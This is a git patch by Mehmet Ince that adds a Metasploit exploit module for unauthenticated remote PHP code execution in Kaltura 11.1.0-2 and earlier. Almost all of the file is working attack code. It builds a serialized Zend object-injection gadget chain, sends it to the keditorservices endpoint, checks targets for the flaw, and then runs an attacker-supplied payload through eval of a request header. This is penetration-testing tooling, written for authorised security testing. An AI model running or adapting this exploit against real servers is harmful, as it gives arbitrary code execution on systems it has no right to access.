From 144fb22c32a6fdda35119b80c579418e3f921e68 Mon Sep 17 00:00:00 2001
From: Mehmet Ince <mehmet@mehmetince.net>
Date: Fri, 2 Sep 2016 18:09:53 +0300
Subject: [PATCH] Add Kaltura PHP Remote Code Execution module

---
 .../unix/webapp/kaltura_unserialize_rce.rb    | 109 ++++++++++++++++++
 1 file changed, 109 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/kaltura_unserialize_rce.rb

diff --git a/modules/exploits/unix/webapp/kaltura_unserialize_rce.rb b/modules/exploits/unix/webapp/kaltura_unserialize_rce.rb
new file mode 100644
index 0000000000..f28ad835fd
--- /dev/null
+++ b/modules/exploits/unix/webapp/kaltura_unserialize_rce.rb
@@ -0,0 +1,109 @@
+
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Kaltura <= 11.1.0-2 Remote PHP Code Execution',
+      'Description'    => %q{
+        This module exploits a Object Injection vulnerability in Kaltura.
+        By exploiting this vulnerability, unauthenticated users can execute
+        arbitrary code under the context of the web server user.
+
+        Kaltura has a module named keditorservices that takes user input
+        and then use it as an unserialize function parameter. The object
+        constructed is based on the SektionEins Zend code execution POP chain PoC,
+        with a minor modification to ensure Kaltura processes it and the
+        Zend_Log function’s __destruct() method is called.
+
+        This module was tested against Kaltura 11.1.0 installation on Ubuntu server.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Security-Assessment.com',             # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'      =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/39563/']
+        ],
+      'Privileged'      => false,
+      'Payload'         =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [ ['Automatic', {}] ],
+      'DisclosureDate'  => 'March 15 2016',
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+        [
+            OptString.new('TARGETURI', [true, 'The target URI of the Kaltura installation', '/'])
+        ]
+    )
+  end
+
+  def check
+    r = rand_text_alpha(15 + rand(4))
+    cmd = "print_r(#{r}).die()"
+
+    p = ""
+    p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
+    p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
+    p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
+    p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
+    p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
+    p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
+    p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
+      'vars_get' => {
+          'kdata' => Rex::Text.encode_base64(p)
+      }
+    )
+
+    if res && res.body.include?(r)
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    cmd = "print_r(eval(base64_decode($_SERVER[HTTP_CMD]))).die()"
+
+    p = ""
+    p << "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";"
+    p << "a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\00*\00_eventsToMail\";"
+    p << "a:1:{i:0;i:1;}s:22:\"\00*\00_layoutEventsToMail\";a:0:{}s:8:\"\00*\00_mail\";"
+    p << "O:9:\"Zend_Mail\":0:{}s:10:\"\00*\00_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\00*\00_inflector\";"
+    p << "O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\00*\00_matchPattern\";s:7:\"/(.*)/e\";"
+    p << "s:15:\"\00*\00_replacement\";s:#{cmd.length.to_s}:\"#{cmd}\";}s:20:\"\00*\00_inflectorEnabled\";"
+    p << "b:1;s:10:\"\00*\00_layout\";s:6:\"layout\";}s:22:\"\00*\00_subjectPrependText\";N;}}};}"
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.php/keditorservices/redirectWidgetCmd'),
+      'headers' => {
+        'Cmd' => Rex::Text.encode_base64(payload.encode)
+      },
+      'vars_get' => {
+        'kdata' => Rex::Text.encode_base64(p)
+      }
+    )
+  end
+end
\ No newline at end of file